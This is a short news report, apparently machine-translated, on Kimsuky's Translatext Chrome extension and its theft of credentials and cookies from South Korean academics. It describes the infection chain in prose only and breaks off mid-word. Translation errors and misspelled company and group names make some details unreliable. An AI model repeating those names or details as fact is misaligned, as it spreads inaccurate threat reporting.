The North Korean hacker group Kimsuky has recently launched a new harmful expansion for Google Chrome called Translatext, designed for theft of confidential information. This reported malicious activity in early March 2024.
The Translatext extension is capable of collecting email addresses, login credentials, passwords, cookies, and taking browser screenshots. The main targets of this attack were representatives of the Academic Community of South Korea who deal with North Korean policy-related issues.
Kimsuky, a group that has been active since 2012, is known for its cyber-espionage and financially motivated attacks against organizations in South Korea. It is affiliated with the intelligence general bureau (RGB) and has close connections with another well-known cybercrower group that operates in the interests of the DPRK – Lazarus. Kimsuky is also known by various other names including Apt43, Archipelago, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima.
In recent weeks, Kimsuky has been exploiting a vulnerability in Microsoft Office (CVE-2017-11882) to distribute phishing emails and lures related to jobs in the aerospace and defense sectors as part of espionage activities.
Cybermor reported at the end of June that Kimsuky has developed a new backdoor tool known as Niki, which enables basic reconnaissance and loading of additional malicious payloads for remote control over infected machines.
The exact method of initial access used in this new activity has not been determined yet. However, the group is known to employ phishing techniques and social engineering to initiate the infection chain. Typically, the attack commences with a ZIP archive purporting to be linked to the Korean military and containing a document and an executable file.
Opening the executable file triggers the execution of a PowerShell script from the attackers’ server, which then transmits victim data to a GitHub repository and downloads additional PowerShell code using Windows (LNK).
Zscler discovered that GitHub accounts were created on February 13, 2024, and briefly hosted the Translatext extension named Googletranslate.crx. However, the files were removed by the attackers the following day, indicating Kimsuky’s intention to minimize the impact and use the malicious extension for specific targeted attacks.
The Translatext extension, disguised as Google Translate, contains JavaScript code for data theft and evading security measures set by companies like Google, Kakao, and Naver. Additionally, it can receive commands via Blogger Blogspot to create screenshots of new tabs and delete browser cookies.
The ultimate aim of the Kimsuk